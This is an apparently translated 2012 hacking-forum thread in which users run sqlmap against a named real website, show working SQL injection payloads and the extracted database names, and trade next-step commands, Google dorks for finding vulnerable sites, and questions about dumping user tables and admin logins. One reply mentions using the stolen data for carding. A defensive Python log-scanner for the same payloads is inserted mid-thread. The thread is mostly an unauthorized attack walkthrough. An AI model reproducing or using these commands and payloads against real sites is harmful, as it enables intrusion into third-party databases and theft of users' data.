SQLi Sqlmap.py
(08-27-2012, 01:46 AM)black.oenta Wrote: Bro, when output like this comes out, what do I do with it next...
Code:
root@bt:/pentest/database/sqlmap# python sqlmap.py -u https://www.marshalls.ky/vehicles.php?id=4 --dbs

    sqlmap/1.0-dev-25eca9d - automatic SQL injection and database takeover tool
    http://sqlmap.org

[!] legal disclaimer: usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Authors assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 00:29:58

[00:29:59] [INFO] testing connection to the target url
[00:30:03] [INFO] testing if the url is stable, wait a few seconds
[00:30:06] [INFO] url is stable
[00:30:06] [INFO] testing if GET parameter 'id' is dynamic
[00:30:08] [INFO] confirming that GET parameter 'id' is dynamic
[00:30:10] [INFO] GET parameter 'id' is dynamic
[00:30:15] [WARNING] reflective value(s) found and filtering out
[00:30:15] [INFO] heuristic test shows that GET parameter 'id' might be injectable (possible DBMS: MySQL)
[00:30:15] [INFO] testing for SQL injection on GET parameter 'id'
[00:30:15] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[00:30:28] [INFO] GET parameter 'id' is 'AND boolean-based blind - WHERE or HAVING clause' injectable
[00:30:28] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'
[00:30:30] [INFO] GET parameter 'id' is 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause' injectable
[00:30:30] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[00:30:33] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[00:30:40] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns'
[00:30:40] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other injection technique found
[00:30:44] [INFO] ORDER BY technique seems to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
[00:30:53] [INFO] target url appears to have 6 columns in query
[00:31:04] [INFO] GET parameter 'id' is 'MySQL UNION query (NULL) - 1 to 20 columns' injectable
GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] y
sqlmap identified the following injection points with a total of 18 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=4 AND 5882=5882

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=4 AND (SELECT 3755 FROM(SELECT COUNT(*),CONCAT(0x3a6d64763a,(SELECT (CASE WHEN (3755=3755) THEN 1 ELSE 0 END)),0x3a6373653a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)

    Type: UNION query
    Title: MySQL UNION query (NULL) - 6 columns
    Payload: id=4 LIMIT 1,1 UNION ALL SELECT NULL, CONCAT(0x3a6d64763a,0x535a776a6e4c76454e49,0x3a6373653a), NULL, NULL, NULL, NULL#
---

[00:31:16] [INFO] the back-end DBMS is MySQL

web application technology: PHP 5.3.13, Apache
back-end DBMS: MySQL 5.0
[00:31:16] [INFO] fetching database names
[00:31:18] [INFO] the SQL query used returns 2 entries
[00:31:20] [INFO] retrieved: "information_schema"
[00:31:22] [INFO] retrieved: "marshal_db"
available databases [2]:                                                      
[*] information_schema
[*] marshal_db

[00:31:22] [INFO] fetched data logged to text files under '/pentest/database/sqlmap/output/www.marshalls.ky'

[*] shutting down at 00:31:22

Please help.
Next, look up the tables and their columns based on the DB name..
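
Added example (not part of the original thread): a defender-side check that flags the three payload shapes from the sqlmap report above when they show up in a web server access log. The log lines, IP addresses and User-Agent value are constructed samples, and `classify`, `scan` and `_line` are names chosen for this example.

```python
import re
from urllib.parse import quote, unquote_plus

# Signatures for the three payload shapes in the sqlmap report quoted above.
SIGNATURES = {
    "boolean-based blind": re.compile(r"\bAND\s+(\d+)\s*=\s*\1\b", re.I),
    "error-based": re.compile(r"FLOOR\(\s*RAND\(\s*0\s*\)\s*\*\s*2\s*\).*GROUP\s+BY", re.I | re.S),
    "UNION query": re.compile(r"\bUNION\s+(ALL\s+)?SELECT\b", re.I),
}
# Apache/nginx "combined" log format.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "[A-Z]+ (?P<target>\S+) [^"]*" '
    r'\d{3} \S+ "[^"]*" "(?P<ua>[^"]*)"')

def classify(target):
    """Return sorted technique labels whose signature matches the decoded query."""
    query = unquote_plus(target.partition("?")[2])
    return sorted(name for name, rx in SIGNATURES.items() if rx.search(query))

def scan(lines):
    """Map client IP -> set of indicators seen across combined-format log lines."""
    hits = {}
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a combined-format line; skip rather than guess
        found = classify(m["target"])
        if "sqlmap" in m["ua"].lower():  # sqlmap's default User-Agent names the tool
            found.append("sqlmap user-agent")
        if found:
            hits.setdefault(m["ip"], set()).update(found)
    return hits

def _line(ip, query, ua="Mozilla/5.0"):
    """Build one constructed log line; the query is percent-encoded as on the wire."""
    target = "/vehicles.php?" + quote(query, safe="=")
    return f'{ip} - - [27/Aug/2012:00:30:15 +0000] "GET {target} HTTP/1.1" 200 512 "-" "{ua}"'

UA = "sqlmap/1.0-dev (http://sqlmap.org)"  # constructed sample value
# Constructed sample log: payloads copied from the report, IPs from 192.0.2.0/24.
SAMPLE = [
    _line("192.0.2.10", "id=4"),
    _line("192.0.2.66", "id=4 AND 5882=5882", UA),
    _line("192.0.2.66", "id=4 AND (SELECT 3755 FROM(SELECT COUNT(*),CONCAT(0x3a6d64763a,"
          "(SELECT (CASE WHEN (3755=3755) THEN 1 ELSE 0 END)),0x3a6373653a,"
          "FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)", UA),
    _line("192.0.2.66", "id=4 LIMIT 1,1 UNION ALL SELECT NULL, CONCAT(0x3a6d64763a,"
          "0x535a776a6e4c76454e49,0x3a6373653a), NULL, NULL, NULL, NULL#", UA),
]
```

Calling `scan(SAMPLE)` groups every indicator under the one client that sent the probes; the plain `id=4` request from the other address produces no hit.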

(08-27-2012, 03:50 AM)budi hatory Wrote:
Next, look up the tables and their columns based on the DB name..

Yep ..

python sqlmap.py -u (url) -D marshal_db --tables

etc.

Wanna Be A Hero But I am start from ZERO

(08-30-2011, 05:10 PM)Veronochi Wrote: On Linux you can use DarkJumper, made by Mywisdom...
The X-code software is usually used on Windows, but a friend of mine uses it on Linux, though I don't know which Wine version he uses??

There are lots of SQLi dorks, bro

for example:
inurl://index.php?id=
inirl://catagory.php?id=
inurl://.php?id=

and many more...

Using dorks like this, the process is like a lucky draw, bro.
Btw, is there a faster way?

(09-08-2012, 08:18 PM)blAnk_pag3 Wrote:
Using dorks like this, the process is like a lucky draw, bro.
Btw, is there a faster way?

Everything takes effort, bro... try them one by one

Let me try this out, bro
thx for sharing

Great for newbies, short, concise and clear.. the problem is, once you're into the dbs, what's the next step???

(10-03-2012, 12:34 AM)rivalcorps Wrote: Great for newbies, short, concise and clear.. the problem is, once you're into the dbs, what's the next step???

Well, that's up to you, bro; usually it moves on to the tables that contain info about users. :d Or, worse, it could even be used for carding.

Say, for example, one of the tables has as many as 25k rows...
How do I take only the data from row 24000 through the last one?
So that not all the data in that table is taken.

Please enlighten me

Bro, I once got the username+pass, but unfortunately I couldn't find the admin page, even though I had used a script made by a foreigner...

I also once got an empty username+password..
What does that mean..?

(09-08-2012, 08:18 PM)blAnk_pag3 Wrote:
Using dorks like this, the process is like a lucky draw, bro.
Btw, is there a faster way?

Try using xsser, bro..

Sorry in advance if this is a stupid question, I'm still very much a beginner, bro

The tutorial above says to first look for a website that has a hole, or look for the SQLi; my question is, how do you find that SQLi? Do you use a tool that's in BT? Please give me some guidance, bro? If possible, could you give a tutorial, bro?

Please help, bro, I've only been using backtrack for a week
Thanks in advance





